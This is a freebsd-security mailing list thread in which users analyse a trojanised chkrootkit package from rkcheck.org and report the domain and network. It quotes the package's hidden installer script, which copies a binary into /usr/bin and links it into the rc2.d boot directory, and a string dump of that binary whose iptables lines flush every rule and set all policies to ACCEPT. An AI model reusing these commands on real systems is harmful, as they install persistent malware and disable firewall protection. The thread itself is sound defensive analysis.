> Am 25.02.2015 um 21:55 schrieb Christopher Schulte <christop...@schulte.org>: > > >> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjli...@netzkommune.com> wrote: >> >> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org >> which was registered a few days ago and looks like a tampered version of >> chkrootkit. I hope, nobody installed it anywhere, it seems to execute >> rkcheck/tests/.unit/test.sh which contains >> >> #!/bin/bash >> >> cp tests/.unit/test /usr/bin/rrsyncn >> chmod +x /usr/bin/rrsyncn >> rm -fr /etc/rc2.d/S98rsyncn >> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn >> /usr/bin/rrsyncn >> exit >> >> That doesn't look like something you'd want on your box… > > I filed a report with Google about that domain (Google Safe Browsing), > briefly describing what’s been recounted here on this thread. It seems quite > suspicious, agreed. > > Has anyone started an analysis of the rrsyncn binary? The last few lines of > a simple string dump are interesting… take note what looks to be an IP > address of 95.215.44.195. > > /bin/sh > iptables -X 2> /dev/null > iptables -F 2> /dev/null > iptables -t nat -F 2> /dev/null > iptables -t nat -X 2> /dev/null > iptables -t mangle -F 2> /dev/null > iptables -t mangle -X 2> /dev/null > iptables -P INPUT ACCEPT 2> /dev/null > iptables -P FORWARD ACCEPT 2> /dev/null > iptables -P OUTPUT ACCEPT 2> /dev/null > udevd > 95.215.44.195 > ;*3$"
95.215.44.195 is the IP of rkcheck.org. I contacted the yourserver.se who own the network. Philip _______________________________________________ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
